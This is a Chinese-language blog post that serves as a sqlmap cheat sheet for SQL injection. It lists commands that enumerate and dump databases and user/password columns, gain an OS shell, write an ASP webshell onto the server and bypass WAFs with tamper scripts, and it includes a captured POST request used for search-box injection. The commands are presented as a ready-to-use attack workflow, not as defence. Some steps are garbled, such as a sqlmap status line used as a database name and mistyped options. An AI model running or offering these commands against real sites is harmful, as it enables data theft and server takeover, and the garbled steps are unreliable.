/*

转载请注明出处

ID:珍惜少年时

*/

相关命令
--current-user #当前数据库用户
--privileges #查看当前数据库权限
--dbms=mssql #指定数据库的类型
--os-shell #执行cmd命令
--is-dba #判断是否为dba权限

Mysql注入

sqlmap -u url --dbs #获取数据库
sqlmap -u url -D 数据库名 --tables #猜表
sqlmap -u url -D 数据库名 -T 表名 --columns #获取字段
sqlmap -u url -D 数据库名 -T 表名 -C id,user,password --dump #获取字段内容

Mssql

sqlmap -u url --dbs #获取数据库
sqlmap -u url -D 数据库名 --tables #猜表
sqlmap -u url -D 数据库名 -T 表名 --columns #获取字段
sqlmap -u url -D 数据库名 -T 表名 -C id,user,password --dump #获取字段内容

Access 注入

sqlmap -u “url” #判断是否存在注入点
sqlmap -u “url” --tables #跑表
sqlmap -u “url” --columns -T 表名 #猜字段
sqlmap -u “url” --dump -T 表名 -C 字段名1,字段名2 #猜字段内容

cookie注入

sqlmap –u “url” –cookie “id=urlid” --table –level 2 #获取表名
sqlmap –u “url” –cookie “id=urlid” --columns –T 表名 –level 2 #获取字段
sqlmap –u “url” –cookie “id=urlid” --dump –T表名 –C “字段名1,字段名2” –level 2 #获取字段内容

post登录框注入

sqlmap –u “url” –forms 自动搜索 代码参数
./sqlmap.py -u “url” –data “ftuname=1&tfupass=1”r

交互写shell及命令执行

./sqlmap.py -u “url” –os –cmd=ipconfig #搞到cmd权限
./sqlmap.py -u “url” –os –shell

伪静态注入

sqlmap -u http://www.test.com/1*.html --dbs #获取数据库
sqlmap -u http://www.test.com/1*.html -D 数据库名 --tables #猜表
sqlmap -u http://www.test.com/1*.html -D 数据库名 -T 表名 --columns #获取字段
sqlmap -u http://www.test.com/1*.html -D 数据库名 -T 表名 -C id,user,password --dump #获取字段内容

请求延时

#参数 –delay --safe-freq 3
sqlmap --dbs -u http://www.test.com/1*.html --delay 时间自定 #获取数据库
sqlmap --dbs -u http://www.test.com/1*.html --safe-freq 次数 #获取数据库

搜索框注入/搜索框post注入

● 检测是否存在注入
● 第一步:在框内提交:%'
● 返回错误即存在注入!
● 第二步:然后抓包-例如抓包数据如下
POST /CN/Search/ HTTP/1.1
Host: www.xxxxx.com
Proxy-Connection: keep-alive
Content-Length: 21
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.xxxxx.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxxxx.com/CN/Search/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCSTSSBDB=DEBHEMHCINDPHGHHPNEBJHEO; _ga=GA1.2.186656237.1405421193; CNZZDATA3440547=cnzz_eid%3D456311074-1405421237-http%253A%252F%252Fwww.xxxxx.com%252F%26ntime%3D1405426801 KeyWords=1%25&x=0&y=0 将抓到的数据包保存为文本(目录需记住,例如我将数据包保存文本到C盘命名为1.txt) 3.>sqlmap打开 执行命令:sqlmap.py -r c:1.txt --bds -v 2 //列数据库 回车后在以后一行得到数据"shutting down at 20:24:05" sqlmap.py -r c:1.txt --tables -D "shutting down at 20:24:05" -v 2 //列表明,假设表明为admin sqlmap.py -r c:1.txt --columns -T "admin" -D "shutting down at 20:24:05" -v 2 //奔字段,假设字段是username和password sqlmap.py -r c:1.txt --dump -C "username.password" -T "admin" -D "shutting down at 20:24:05" -v 2

tamper插件的使用/WAFBYPASS/Bypasswaf/waf bypass/

参数:
● batch 要求不对目标写入
● tamper 干预脚本
sqlmap.py -u "url" -v 3 --batch --tamper "base64encode.py"
注:base64encode.py 为编码,在tamper目录下。且等级必须是3级或以上。

tamper脚本下载:https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/

temper脚本:
针对MYSQL:space2morehash.py space2hash.py
空格替换:space2mssqlblank.py space2mysqlblank.py、
打乱编码:charencode.py chardoubleencode.py
针对asp/asp.net:charunicodeencode.py percentage.py


file参数的使用/写入

file-write 本地路径
file-dest 网站路径
sqlmap.py -u "url" --file-write=本地shell路径 --file-dest=网站物理路径/hello.asp
注:
● 需要有dba或sa或root权限
● 路径须是正斜杠(/)

 SQLMAP脱裤

--dump-all  #会在系统缓存目录C:\Users\Administrator\.sqlmap\output 目录下生成XLS文件

 设置线程

--threads 10
某些网站有防注入保护,短时间内如果请求次数较多或短时间内请求错误页面次数较多都可能被网站屏蔽
sqlmap -u "www.xxx.com/index.php/Index/view/id/40*.html" --dbs --delay 5    //间隔5秒请求一次

  

sqlmap怎么指定使用 https

回答:--force-ssl

待更新....

sqlmap笔记本的更多相关文章

  1. 使用SQLMAP对网站和数据库进行SQL注入攻击

    from:http://www.blackmoreops.com/2014/05/07/use-sqlmap-sql-injection-hack-website-database/ 0x00 背景介 ...

  2. 使用sqlmap

    实验环境要求: 1.安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB 2.安装VMware Workstation 14以上 总体目标:基于centos7搭建dvwa web ...

  3. 关于sqlmap的使用

    好记性不如烂笔头,记录一下. 带cookie的注入 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="coo ...

  4. 设置Fn键 笔记本直接按F1-F12 无须按Fn键 Fn+F12改F12(联想小新300为例)

    最近公司给配的笔记本联想小新300 80RT  i7-6500U 4G内存 500G机械,后加装120G固态+4G内存 这样就感觉还不错了. 在使用这本子的时候,去了Win10,强行装了Win7.无线 ...

  5. SQLMap Tamper Scripts Update 04/July/2016

    SQLMap Tamper Scripts Update apostrophemask.py Replaces apostrophe character with its UTF-8 full wid ...

  6. 定制sqlmap tamper脚本

    前言 渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了. 测试 在测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接 ...

  7. sqlmap --dns-domain模拟实践

    因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入 ...

  8. 防止sql注入和sqlmap介绍

    sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...

  9. sqlmap 帮助信息

    Usage: sqlmap.py [options] 选项: -h, --help 显示基本的帮助信息并退出 -hh 显示高级的帮助信息并退出 --version 显示程序版本号并退出 -v VERB ...

随机推荐

  1. css011 表格和表单的格式化

    css011 表格和表单的格式化 一.    让表格专司其职    Html中创建一个三行三列的表格 <table> <caption align="bottom" ...

  2. 加载信息,先从数据库取出5条实现分页,鼠标向上滑动触发Ajax再加载5条,达到异步刷新,优化加载。。。

    php数据库取数据 <?php include("conn1.php"); include('../function/functions.php'); $page=intva ...

  3. 初识Hadoop二,文件操作

    1.使用hadoop命令查看hdfs下文件 [root@localhost hadoop-2.7.3]# hadoop fs -ls hdfs://192.168.36.134:9000/ 开始在se ...

  4. /etc/profile、/etc/bashrc、~/.bash_profile、~/.bashrc 的区别(转)

    /etc/profile:此文件为系统的每个用户设置环境信息,当用户第一次登录时,该文件被执行并从/etc/profile.d目录的配置文件中搜集shell的设置. /etc/bashrc:为每一个运 ...

  5. Construct Bounding Sphere

    点集的包围球 http://en.wikipedia.org/wiki/Bounding_sphere http://blogs.agi.com/insight3d/index.php/2008/02 ...

  6. JAVA GUI随笔

    Java的布局管理器提供了一种层面的抽象,自动将用户界面映射到所有的窗口系统.GUI组件放置在容器中,它们的位置由容器的布局管理器来管理. 布局管理器是使用布局管理器类创建的. 注:同一个对象无论添加 ...

  7. Ubuntu用作Server时出现乱码的解决方法

    下面给出解决办法: 1.用vi编辑器修改/etc/default/local文件 2.把原来的中文编码替换成下面的 LANG="en_US.UTF-8" LANGUAGE=&quo ...

  8. 为什么要做url encode

    因为 url 对字符有限制,比如把一个邮箱放入 url,就需要使用 urlencode 函数,因为 url 中不能包含 @ 字符.

  9. Orchard源码分析(5):Host相关(Orchard.Environment.DefaultOrchardHost类)

    概述 Host 是应用程序域级的单例,代表了Orchard应用程序.其处理应用程序生命周期中的初始化.BeginRequest事件.EndRequest事件等. 可以简单理解为HttpApplicat ...

  10. Jetty与tomcat的比较

    Google 应用系统引擎最初是以 Apache Tomcat 作为其 webserver/servlet 容器的,但最终将切换到 Jetty 上. 这个决定让许多开发人员都诧异的想问:为什么要做这样 ...